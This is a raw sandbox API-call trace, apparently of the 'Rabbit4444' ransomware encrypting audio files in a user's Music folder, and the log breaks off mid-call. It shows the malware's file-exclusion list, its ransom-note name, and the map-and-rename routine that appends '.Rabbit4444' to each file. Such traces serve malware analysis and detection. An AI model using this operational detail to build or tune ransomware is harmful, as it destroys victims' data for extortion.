1 [0049.191] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=94991) returned 1 [0049.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0049.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0049.191] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17610, lpName=0x0) returned 0x298 [0049.191] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17610) returned 0x70000 [0049.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.193] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14050426433) returned 1 [0049.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0049.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0049.194] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.195] CloseHandle (hObject=0x298) returned 1 [0049.195] CloseHandle (hObject=0x278) returned 1 [0049.197] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\4f5YCJ0pI.wav.Rabbit4444") returned 67 [0049.197] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\4f5YCJ0pI.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\4f5ycj0pi.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\4f5YCJ0pI.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\4f5ycj0pi.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.199] InterlockedExchangeAdd (in: Addend=0xff618, Value=94992 | out: Addend=0xff618) returned 20250176 [0049.199] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3493 [0049.199] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c168660, ftCreationTime.dwHighDateTime=0x1d4c925, ftLastAccessTime.dwLowDateTime=0x6ede20f0, ftLastAccessTime.dwHighDateTime=0x1d4d307, ftLastWriteTime.dwLowDateTime=0x6ede20f0, ftLastWriteTime.dwHighDateTime=0x1d4d307, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bpiTJAjWP1.m4a", cAlternateFileName="BPITJA~1.M4A")) returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2=".") returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="..") returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="windows") returned -1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="bootmgr") returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="pagefile.sys") returned -1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="boot") returned 1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="ids.txt") returned -1 [0049.199] lstrcmpiW (lpString1="bpiTJAjWP1.m4a", lpString2="NTUSER.DAT") returned -1 [0049.199] lstrcpyW (in: lpString1=0x130eb8e, lpString2="bpiTJAjWP1.m4a" | out: lpString1="bpiTJAjWP1.m4a") returned="bpiTJAjWP1.m4a" [0049.199] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\bpiTJAjWP1.m4a", dwFileAttributes=0x0) returned 1 [0049.199] lstrlenW (lpString="bpiTJAjWP1.m4a") returned 14 [0049.199] lstrlenW (lpString="Rabbit4444") returned 10 [0049.199] lstrcmpiW (lpString1="JAjWP1.m4a", lpString2="Rabbit4444") returned -1 [0049.199] lstrlenW (lpString=".dll") returned 4 [0049.199] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.199] lstrlenW (lpString=".lnk") returned 4 [0049.200] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.200] lstrlenW (lpString=".ini") returned 4 [0049.200] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.200] lstrlenW (lpString=".sys") returned 4 [0049.200] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.200] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\bpiTJAjWP1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\bpitjajwp1.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.200] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.200] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14051054199) returned 1 [0049.200] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1231) returned 1 [0049.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0049.200] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0049.200] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0049.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.201] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14057219709) returned 1 [0049.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0049.262] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.262] CloseHandle (hObject=0x298) returned 1 [0049.262] CloseHandle (hObject=0x278) returned 1 [0049.263] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\bpiTJAjWP1.m4a.Rabbit4444") returned 68 [0049.263] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\bpiTJAjWP1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\bpitjajwp1.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\bpiTJAjWP1.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\bpitjajwp1.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.264] InterlockedExchangeAdd (in: Addend=0xff618, Value=1232 | out: Addend=0xff618) returned 20345168 [0049.264] InterlockedExchangeAdd (in: Addend=0xff624, Value=61 | out: Addend=0xff624) returned 3495 [0049.264] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb584460, ftCreationTime.dwHighDateTime=0x1d4c656, ftLastAccessTime.dwLowDateTime=0xc78d4080, ftLastAccessTime.dwHighDateTime=0x1d4cbb1, ftLastWriteTime.dwLowDateTime=0xc78d4080, ftLastWriteTime.dwHighDateTime=0x1d4cbb1, nFileSizeHigh=0x0, nFileSizeLow=0x2169, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dhAbWJ5UgoBr80.wav", cAlternateFileName="DHABWJ~1.WAV")) returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="Rabbit4444.exe") returned -1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2=".") returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="..") returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="windows") returned -1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="bootmgr") returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="pagefile.sys") returned -1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="boot") returned 1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="ids.txt") returned -1 [0049.264] lstrcmpiW (lpString1="dhAbWJ5UgoBr80.wav", lpString2="NTUSER.DAT") returned -1 [0049.264] lstrcpyW (in: lpString1=0x130eb8e, lpString2="dhAbWJ5UgoBr80.wav" | out: lpString1="dhAbWJ5UgoBr80.wav") returned="dhAbWJ5UgoBr80.wav" [0049.264] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\dhAbWJ5UgoBr80.wav", dwFileAttributes=0x0) returned 1 [0049.264] lstrlenW (lpString="dhAbWJ5UgoBr80.wav") returned 18 [0049.264] lstrlenW (lpString="Rabbit4444") returned 10 [0049.264] lstrcmpiW (lpString1="goBr80.wav", lpString2="Rabbit4444") returned -1 [0049.264] lstrlenW (lpString=".dll") returned 4 [0049.264] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.265] lstrlenW (lpString=".lnk") returned 4 [0049.265] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.265] lstrlenW (lpString=".ini") returned 4 [0049.265] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.265] lstrlenW (lpString=".sys") returned 4 [0049.265] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.265] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\dhAbWJ5UgoBr80.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\dhabwj5ugobr80.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.265] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.265] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14057558184) returned 1 [0049.265] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8553) returned 1 [0049.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.265] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2470, lpName=0x0) returned 0x298 [0049.265] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2470) returned 0x70000 [0049.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.266] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14057687592) returned 1 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.266] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.266] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.266] CloseHandle (hObject=0x298) returned 1 [0049.266] CloseHandle (hObject=0x278) returned 1 [0049.270] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\dhAbWJ5UgoBr80.wav.Rabbit4444") returned 72 [0049.270] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\dhAbWJ5UgoBr80.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\dhabwj5ugobr80.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\dhAbWJ5UgoBr80.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\dhabwj5ugobr80.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.270] InterlockedExchangeAdd (in: Addend=0xff618, Value=8560 | out: Addend=0xff618) returned 20346400 [0049.270] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3556 [0049.270] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb6e340, ftCreationTime.dwHighDateTime=0x1d4d2d8, ftLastAccessTime.dwLowDateTime=0x2521b2e0, ftLastAccessTime.dwHighDateTime=0x1d4ce09, ftLastWriteTime.dwLowDateTime=0x2521b2e0, ftLastWriteTime.dwHighDateTime=0x1d4ce09, nFileSizeHigh=0x0, nFileSizeLow=0x180fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oe8JSBpRp6FDH0.wav", cAlternateFileName="OE8JSB~1.WAV")) returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="Rabbit4444.exe") returned -1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2=".") returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="..") returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="windows") returned -1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="bootmgr") returned 1 [0049.270] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="pagefile.sys") returned -1 [0049.271] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="boot") returned 1 [0049.271] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="ids.txt") returned 1 [0049.271] lstrcmpiW (lpString1="oe8JSBpRp6FDH0.wav", lpString2="NTUSER.DAT") returned 1 [0049.271] lstrcpyW (in: lpString1=0x130eb8e, lpString2="oe8JSBpRp6FDH0.wav" | out: lpString1="oe8JSBpRp6FDH0.wav") returned="oe8JSBpRp6FDH0.wav" [0049.271] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\oe8JSBpRp6FDH0.wav", dwFileAttributes=0x0) returned 1 [0049.271] lstrlenW (lpString="oe8JSBpRp6FDH0.wav") returned 18 [0049.271] lstrlenW (lpString="Rabbit4444") returned 10 [0049.271] lstrcmpiW (lpString1="p6FDH0.wav", lpString2="Rabbit4444") returned -1 [0049.271] lstrlenW (lpString=".dll") returned 4 [0049.271] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.271] lstrlenW (lpString=".lnk") returned 4 [0049.271] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.271] lstrlenW (lpString=".ini") returned 4 [0049.271] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.271] lstrlenW (lpString=".sys") returned 4 [0049.271] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\oe8JSBpRp6FDH0.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\oe8jsbprp6fdh0.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.271] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.271] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14058206108) returned 1 [0049.271] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=98557) returned 1 [0049.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.271] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0049.271] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18400, lpName=0x0) returned 0x298 [0049.272] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18400) returned 0x70000 [0049.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.274] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.274] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14058519950) returned 1 [0049.275] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.275] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0049.275] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.276] CloseHandle (hObject=0x298) returned 1 [0049.276] CloseHandle (hObject=0x278) returned 1 [0049.278] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\oe8JSBpRp6FDH0.wav.Rabbit4444") returned 72 [0049.279] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\oe8JSBpRp6FDH0.wav" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\oe8jsbprp6fdh0.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\oe8JSBpRp6FDH0.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\oe8jsbprp6fdh0.wav.rabbit4444"), dwFlags=0x1) returned 1 [0049.279] InterlockedExchangeAdd (in: Addend=0xff618, Value=98560 | out: Addend=0xff618) returned 20354960 [0049.279] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3557 [0049.279] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb6ce740, ftCreationTime.dwHighDateTime=0x1d4d139, ftLastAccessTime.dwLowDateTime=0x266783c0, ftLastAccessTime.dwHighDateTime=0x1d4cd21, ftLastWriteTime.dwLowDateTime=0x266783c0, ftLastWriteTime.dwHighDateTime=0x1d4cd21, nFileSizeHigh=0x0, nFileSizeLow=0x14540, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WYQAYXsDjvTvV PGyfOr.m4a", cAlternateFileName="WYQAYX~1.M4A")) returned 1 [0049.279] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.279] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.279] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="Rabbit4444.exe") returned 1 [0049.279] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2=".") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="..") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="windows") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="bootmgr") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="pagefile.sys") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="boot") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="ids.txt") returned 1 [0049.280] lstrcmpiW (lpString1="WYQAYXsDjvTvV PGyfOr.m4a", lpString2="NTUSER.DAT") returned 1 [0049.280] lstrcpyW (in: lpString1=0x130eb8e, lpString2="WYQAYXsDjvTvV PGyfOr.m4a" | out: lpString1="WYQAYXsDjvTvV PGyfOr.m4a") returned="WYQAYXsDjvTvV PGyfOr.m4a" [0049.280] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\WYQAYXsDjvTvV PGyfOr.m4a", dwFileAttributes=0x0) returned 1 [0049.280] lstrlenW (lpString="WYQAYXsDjvTvV PGyfOr.m4a") returned 24 [0049.280] lstrlenW (lpString="Rabbit4444") returned 10 [0049.280] lstrcmpiW (lpString1="PGyfOr.m4a", lpString2="Rabbit4444") returned -1 [0049.280] lstrlenW (lpString=".dll") returned 4 [0049.280] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.280] lstrlenW (lpString=".lnk") returned 4 [0049.280] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.280] lstrlenW (lpString=".ini") returned 4 [0049.280] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.280] lstrlenW (lpString=".sys") returned 4 [0049.280] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\MK kMG3hBIR2Rc1-7xXp\\WYQAYXsDjvTvV PGyfOr.m4a" (normalized: "c:\\users\\fd1hvy\\music\\mk kmg3hbir2rc1-7xxp\\wyqayxsdjvtvv pgyfor.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.280] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.280] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14059117606) returned 1 [0049.280] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83264) returned 1 [0049.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0049.281] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14840, lpName=0x0) returned 0x298 [0049.281] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14840) returned 0x70000 [0049.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.283] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.283] HeapFree (in: hHeap=0xe0000, 